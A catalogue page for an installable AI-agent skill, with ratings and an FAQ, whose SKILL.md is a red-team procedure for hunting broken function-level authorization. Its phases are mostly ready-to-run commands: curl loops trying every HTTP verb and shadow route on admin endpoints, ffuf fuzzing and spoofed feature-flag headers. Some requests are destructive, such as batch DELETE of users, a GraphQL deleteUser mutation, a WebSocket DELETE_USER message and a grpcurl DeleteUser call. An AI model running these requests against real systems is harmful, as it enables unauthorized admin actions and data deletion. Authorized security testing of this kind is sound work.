hunt-broken-function-level-auth
Hunt broken function-level authorization via verb drift, route shadowing, and transport gaps.
Install / Use
npx skills add uphiago/recon-skills --skill hunt-broken-function-level-authInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
Development & EngineeringSupported Platforms
Our assessment of hunt-broken-function-level-auth
hunt-broken-function-level-auth scores 89/100 on our quality scale, 1200th of 4,259 Development & Engineering skills we index (top 29%).
Its SKILL.md is 6.0 KB long, well organised into 26 sections with 7 code examples: a thorough specification that gives an agent plenty to work with.
With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 29 days ago, so hunt-broken-function-level-auth is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
hunt-broken-function-level-auth compared with similar skills
All 4 of these similar skills score higher than hunt-broken-function-level-auth; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| hunt-broken-function-level-auth (this skill)by uphiago | 89 | 1.3k | 29d ago | SKILL.md |
| Agent-Reachby Panniantong | 100 | 86.6k | 15d ago | CLAUDE.md |
| headroomby headroomlabs-ai | 100 | 74.2k | today | CLAUDE.md |
| ai-job-searchby MadsLorentzen | 100 | 44.6k | 1d ago | CLAUDE.md |
| claude-howtoby luongnv89 | 100 | 41.7k | today | CLAUDE.md |
Frequently asked questions
- How do I install hunt-broken-function-level-auth?
- Run
npx skills add uphiago/recon-skills --skill hunt-broken-function-level-auth. The install tabs above show the steps for each supported agent. - Which AI agents does hunt-broken-function-level-auth work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is hunt-broken-function-level-auth safe to use?
- It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is hunt-broken-function-level-auth still maintained?
- The repository was last updated 29 days ago, so hunt-broken-function-level-auth is actively maintained.
Skill content
View source on GitHubname: hunt-broken-function-level-auth description: Hunt broken function-level authorization via verb drift, route shadowing, and transport gaps. category: redteam version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, ffuf tags: [redteam, authorization, function-level, API, verb-drift, route-shadowing] related_skills:
- hunt-idor
- hunt-auth-bypass
- hunt-api-misconfig
Broken Function Level Authorization
Hunt for endpoints where authorization is enforced at the controller/middleware level but bypassed through HTTP verb drift, legacy routes, shadow endpoints, or transport protocol inconsistencies. Unlike IDOR (object-level), this targets ACTION-level authorization — can a user invoke admin functions despite lacking the admin role.
When to Use
- API has distinct user roles (admin, moderator, user) but role checks are per-controller, not per-method.
- Legacy or deprecated endpoints still served behind updated middleware.
- GraphQL, gRPC, and WebSocket transports exist alongside REST APIs without authorization parity.
- Feature flags or beta endpoints expose functionality before security review.
- Batch/job endpoints accept internal requests without role verification.
Quick Detection
# Verb drift: try PUT/DELETE on endpoints that return 403 on GET
for method in GET POST PUT PATCH DELETE OPTIONS; do
curl --max-time 30 --connect-timeout 10 -sk -X "$method" "https://target.com/api/admin/users" -w "$method %{http_code}\n" -o /dev/null
done
Procedure
Phase 1 — HTTP Verb Drift
# Admin endpoints — each HTTP method may have different auth
ENDPOINTS=(
"/api/admin/users"
"/api/admin/settings"
"/api/manage/orders"
"/api/internal/config"
)
for ep in "${ENDPOINTS[@]}"; do
for method in GET POST PUT PATCH DELETE; do
curl --max-time 30 --connect-timeout 10 -sk -X "$method" "https://target.com$ep" \
-w "$method $ep — %{http_code}\n" -o /dev/null
done
# Also try custom methods
curl --max-time 30 --connect-timeout 10 -sk -X "PURGE" "https://target.com$ep" -o /dev/null -w "PURGE — %{http_code}\n"
curl --max-time 30 --connect-timeout 10 -sk -X "DEBUG" "https://target.com$ep" -o /dev/null -w "DEBUG — %{http_code}\n"
done
Phase 2 — Route Shadowing
# Legacy routes that bypass modern middleware
for path in "/api/v0/" "/api/v1/" "/api/legacy/" "/api/internal/" "/api/beta/" \
"/api/mobile/" "/api/partner/" "/api/integration/" "/api/webhook/"; do
curl --max-time 30 --connect-timeout 10 -sk "https://target.com${path}users" -w "%{http_code} — $path\n" -o /dev/null
done
# ffuf for route discovery
ffuf -u "https://target.com/api/FUZZ/users" \
-w /path/to/prefixes.txt \
-mc 200,301,401,403
Phase 3 — Feature Flag Bypass
# Beta/preview endpoints often lack authorization
for flag in "beta" "preview" "canary" "experimental" "new" "v2" "preview"; do
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/${flag}/admin" -w "%{http_code} — $flag\n" -o /dev/null
done
# Feature flags in headers or cookies
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/admin/users" \
-H "X-Feature-Flags: admin" \
-H "X-Experimental: true" \
-H "X-Beta-Access: 1"
Phase 4 — Batch & Job Endpoints
# Batch operations may skip per-item authorization
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/batch" \
-H "Content-Type: application/json" \
-d '{"operations":[{"method":"DELETE","path":"/users/1"},{"method":"GET","path":"/admin/logs"}]}'
# Background job endpoints
for path in "/api/jobs" "/api/tasks" "/api/cron" "/api/queue" "/api/workers"; do
curl --max-time 30 --connect-timeout 10 -sk "https://target.com${path}/admin-cleanup" -w "%{http_code} — $path\n" -o /dev/null
done
Phase 5 — Transport Protocol Inconsistency
# GraphQL — check if mutations allow admin actions without role check
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"mutation { deleteUser(id: 1) { success } }"}'
# WebSocket — actions sent over WS may skip REST middleware
# Test via wscat
echo '{"type":"DELETE_USER","payload":{"userId":1}}' | wscat -c "wss://target.com/ws"
# gRPC — reflection may expose admin methods
grpcurl -plaintext target.com:50051 list
grpcurl -plaintext target.com:50051 admin.UserService/DeleteUser
Phase 6 — Content-Type Middleware Gaps
# Different content types may hit different parsers/middleware
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/admin/users" \
-H "Accept: application/xml" \
-H "Content-Type: application/xml" \
-d '<user><name>test</name></user>'
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/admin/users" \
-H "Content-Type: multipart/form-data" \
-F "name=test"
Pitfalls
- 405 Method Not Allowed ≠ no auth. The method must exist AND lack authorization to be a finding.
- Route shadowing requires the shadow endpoint to accept authenticated requests. A public user-info endpoint is not a finding.
- GraphQL
deleteUseron a consumer-facing mutation is an IDOR, not BFLA. BFLA is about action-level privileges, not object ownership. - WebSocket authorization bypass requires proof that the WS handler skips REST middleware checks. Compare WS vs REST for the same action.
Verification
- A lower-privilege user invokes an admin-only action via an unguarded HTTP method, shadow route, or transport protocol.
- The action succeeds (not just returns a different error — actually performs the operation).
- The same action via the standard path (REST GET/POST) correctly returns 403.
- Document the specific method, endpoint, and transport protocol that bypasses authorization.
Related Skills
hunt-idor— Object-level authorization (accessing other users' data).hunt-auth-bypass— Complete authentication bypass patterns.hunt-api-misconfig— API-level misconfigurations including transport gaps.
Related Skills
Agent-Reach
86.6kGive your AI agent eyes to see the entire internet. Read & search Twitter, Reddit, YouTube, GitHub, Bilibili, XiaoHongShu — one CLI, zero API fees.
headroom
74.2kCompress tool outputs, logs, files, and RAG chunks before they reach the LLM. 20% fewer tokens for coding agents, 60-95% fewer tokens for JSON, same answers. Library, proxy, MCP server.
ai-job-search
44.6kThe job search that runs on your machine. AI job application framework built on Claude Code: evaluate postings, tailor CVs, write cover letters, prep interviews. Fork it and own it.
claude-howto
41.7kA visual, example-driven guide to Claude Code — from basic concepts to advanced agents, with copy-paste templates that bring immediate value.
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
